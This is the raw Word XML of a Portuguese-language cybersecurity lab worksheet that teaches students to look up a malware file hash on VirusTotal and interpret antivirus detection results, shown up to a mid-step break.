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7C745" w14:textId="7F933B6A" w:rsidR="004E7D33" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rStyle w:val="LabTitleInstVersred"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Laboratório - Ferramentas de investigação de malware on-line</w:t>
      </w:r>
      <w:r w:rsidR="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E046C65" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Objetivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF3FB9" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25Bold"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Parte 1: Executar análise estática de malware </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC7EBD" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25Bold"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Parte 2: Executar análise dinâmica de malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5296ED07" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00C7266A" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25Bold"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7266A">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Parte 3: Investigar um Exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310139E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Apresentação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD415C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Há muitas ferramentas de análise de malware disponíveis online. Essas ferramentas fornecem funções de referência e análise. Por exemplo, você pode enviar indicadores de comprometimento (IOC), como hashes de arquivo, URLs ou endereços IP, e a ferramenta consultará o IOC e retornará informações sobre explorações que compartilham essas características. Arquivos suspeitos também podem ser enviados. A análise estática de malware pode enviar o arquivo para uma coleção de programas antivírus e retornar os resultados. Uma análise mais aprofundada também pode ser realizada dissecando os arquivos no nível binário. Os sandboxes online realizarão uma análise dinâmica de malware, na qual a exploração do malware é executada da mesma forma que infecta um computador host vulnerável. Isso é feito ao executar o malware em uma máquina virtual com ferramentas especiais que monitoram o comportamento do malware. Isso é conhecido como um sandbox de malware. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51194D" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">A análise dinâmica de malware fornece informações detalhadas sobre o comportamento do malware e os artefatos que ele cria. Essas informações podem ser usadas para identificar versões novas ou atualizadas de malware, avaliar os efeitos de uma infecção e levar a descobertas de explorações futuras. Por exemplo, algum malware é usado como um serviço de entrega para outras explorações de malware. O malware do serviço de entrega pode ser identificado, mas o malware que ele distribuiu pode não ser. A análise dinâmica pode revelar o que foi entregue e a exploração pode ser mais investigada. Neste laboratório, você usará duas ferramentas de investigação de malware on-line para aprender sobre uma exploração. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75447643" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Cenário</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79D9A1" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Você está trabalhando na XYZ, Inc. como um técnico cibernético. Você foi solicitado a ajudar um analista de segurança digital a avaliar os alertas de segurança gerados pelo IPS (Sistema de prevenção contra invasão). O IPS sinalizou uma série de eventos como potencialmente mal-intencionados. O analista forneceu um grupo de IOCs em potencial para investigar. Você está usando duas ferramentas on-line para realizar análises estáticas e dinâmicas com base nos IOCs. Embora seja possível enviar arquivos de malware também, o analista acredita que é melhor usar os IOCs até que você tenha mais experiência em lidar com arquivos de malware reais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039EE7E8" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Recursos necessários</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023370C6" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Webdings" w:hAnsi="Webdings"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>1 PC com acesso à Internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A05F8" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Webdings" w:hAnsi="Webdings"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>CSE-LABVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643AAC1" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Instruções</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFA664C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Parte 1: Executar análise estática de malware </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D336B65" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Nesta parte, você enviará um hash de arquivo para um serviço online que pesquisará o hash e retornará informações sobre o arquivo de malware associado. O hash do arquivo é uma representação computada, ou impressão digital, de um arquivo. Os hashes de arquivo são únicos e extremamente difíceis de duplicar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABE952" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Etapa 1: Enviar o hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622AA49" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Nesta etapa, você enviará o valor de hash para uma ferramenta de análise de malware estática que fornece mais informações sobre o arquivo de malware, caso ele seja conhecido pela ferramenta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB6E89" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Inicie o CSE-LABVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC6A91" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Abra um navegador da Web e acesse o site </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22910CA0" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O hash do arquivo que você recebeu é:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319E28B2" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00DC2D04">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>05383088d0d46a5b5f4de852703601a6c39f04844ab63a1850197fcb011f3c81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C14F3" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Selecione e copie o valor do hash. Clique na entrada </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pesquisar</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no menu do VírusTotal e cole o hash na caixa de pesquisa. Pressione a tecla Enter para executar a pesquisa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C7169" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O VirusTotal tem informações sobre o arquivo, o que significa que um arquivo com o mesmo hash foi enviado anteriormente para análise. Você verá os resultados da análise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4067BFC2" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Perguntas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67343D8E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O malware entrou na rede da XYZ, Inc.?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B49863" w14:textId="28DA16AC" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5646D020" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Em seu trabalho, o que você deve fazer agora?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AEE2B" w14:textId="51A489CB" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3FB2A1" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Etapa 2: Interpretar as informações totais de vírus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B47726" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O VirusTotal envia arquivos que foram carregados pelo público para vários agentes antivírus para análise. Neste caso foi submetido a 63 produtos de antivírus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4BAA2C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pergunta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CC2AC1" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Quantos dos produtos de antivírus marcaram o arquivo como mal-intencionado? O que isso diz sobre a confiabilidade dos programas antivírus?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290F7C6" w14:textId="3087CD00" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7E2E30" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Selecione a guia </w:t>
      </w:r>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Detalhes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>. Aqui você pode saber mais sobre o arquivo. Revise as informações fornecidas. Observe que algumas dessas informações podem não ser precisas e podem exigir confirmação com outros sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BEB74F" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pergunta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B43AB" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Que tipo de arquivo foi identificado como malware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C5CF06" w14:textId="64D053A9" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A3C6AA" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Alterne para a guia </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Relações</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
